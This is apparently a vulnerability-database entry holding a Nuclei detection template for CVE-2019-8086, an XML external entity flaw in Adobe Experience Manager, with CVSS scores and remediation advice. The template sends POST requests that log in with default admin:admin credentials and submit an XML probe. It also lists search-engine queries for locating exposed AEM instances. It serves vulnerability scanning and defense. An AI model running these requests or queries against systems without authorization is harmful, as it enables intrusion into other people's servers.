CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
AI Score
Confidence
High
EPSS
Percentile
95.4%
Adobe Experience Manager 6.5, 6.4, 6.3 and 6.2 are susceptible to XML external entity injection. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
id: CVE-2019-8086
info:
name: Adobe Experience Manager - XML External Entity Injection
author: DhiyaneshDk
severity: high
description: Adobe Experience Manager 6.5, 6.4, 6.3 and 6.2 are susceptible to XML external entity injection. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, server-side request forgery, and potential remote code execution.
remediation: |
Apply the necessary security patches provided by Adobe to mitigate the vulnerability. Additionally, ensure that the server is properly configured to restrict access to sensitive files and prevent XXE attacks.
reference:
- https://speakerdeck.com/0ang3el/a-hackers-perspective-on-aem-applications-security?slide=13
- https://github.com/0ang3el/aem-hacker/blob/master/aem_hacker.py
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2019-8086
- https://nvd.nist.gov/vuln/detail/CVE-2019-8086
- https://helpx.adobe.com/security/products/experience-manager/apsb19-48.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2019-8086
cwe-id: CWE-611
epss-score: 0.13896
epss-percentile: 0.95652
cpe: cpe:2.3:a:adobe:experience_manager:6.2:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: adobe
product: experience_manager
shodan-query:
- http.title:"AEM Sign In"
- http.component:"Adobe Experience Manager"
- http.component:"adobe experience manager"
- http.title:"aem sign in"
- cpe:"cpe:2.3:a:adobe:experience_manager"
fofa-query: title="aem sign in"
google-query: intitle:"aem sign in"
tags: cve,cve2019,aem,adobe
http:
- raw:
- |
POST /content/{{randstr}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Authorization: Basic YWRtaW46YWRtaW4=
Referer: {{BaseURL}}
sling:resourceType=fd/af/components/guideContainer
- |
POST /content/{{randstr}}.af.internalsubmit.json HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Authorization: Basic YWRtaW46YWRtaW4=
Referer: {{BaseURL}}
guideState={"guideState"%3a{"guideDom"%3a{},"guideContext"%3a{"xsdRef"%3a"","guidePrefillXml"%3a"<afData>\u0041\u0042\u0043</afData>"}}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<afData>ABC<afBoundData/>'
- type: word
part: header
words:
- application/json
- type: status
status:
- 200
# digest: 490a004630440220557ca481b084c387fef96e4719dff475473fd01c9c6ea0b6df4e3019198ab8060220290c7769bf61f70e62876e6dedd624b75002cb4639a949f5bbbb4b312ebe24f9:922c64590222798bb761d5b6d8e72950
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
AI Score
Confidence
High
EPSS
Percentile
95.4%